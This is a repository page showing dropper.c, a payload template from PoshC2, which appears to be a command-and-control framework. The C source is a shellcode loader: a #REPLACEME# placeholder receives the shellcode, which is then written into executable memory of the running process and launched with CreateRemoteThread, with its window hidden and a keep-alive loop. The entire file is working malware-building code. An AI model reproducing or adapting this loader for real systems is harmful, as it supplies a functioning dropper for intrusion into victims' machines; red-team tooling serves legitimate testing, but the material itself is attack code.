Codebase list poshc2 / b73aa478-bf54-467a-8d17-1a253de382db/main resources / payload-templates / dropper.c
b73aa478-bf54-467a-8d17-1a253de382db/main

Tree @b73aa478-bf54-467a-8d17-1a253de382db/main (Download .tar.gz)

dropper.c @b73aa478-bf54-467a-8d17-1a253de382db/mainraw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#define WINVER 0x0501

#include<windows.h>

#REPLACEME#

void pump(DWORD);

int main(int argc, char *argv[])
{
	STARTUPINFO si = { sizeof(STARTUPINFO) };
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    PROCESS_INFORMATION pi= {0};
	int processID = GetCurrentProcessId();
	pump(processID);
	while(1) {Sleep(50000);}
	return 0;
}


void pump(DWORD dwProcessID) {
	HANDLE hProc;
	HANDLE hRemoteThread;
	PVOID pRemoteBuffer;

	if(!dwProcessID) {
		exit(0);
	}
	hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);
	if(!hProc) {
		exit(0);
	}
	pRemoteBuffer = VirtualAllocEx(hProc, NULL, sizeof(sc)*2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (!pRemoteBuffer) {
		exit(0);
	}
	if (!WriteProcessMemory(hProc, pRemoteBuffer, sc, sizeof(sc), NULL)) {
		exit(0);
	}
	CreateRemoteThread(hProc, NULL, 0, pRemoteBuffer, NULL, 0, NULL);
	CloseHandle(hProc);
}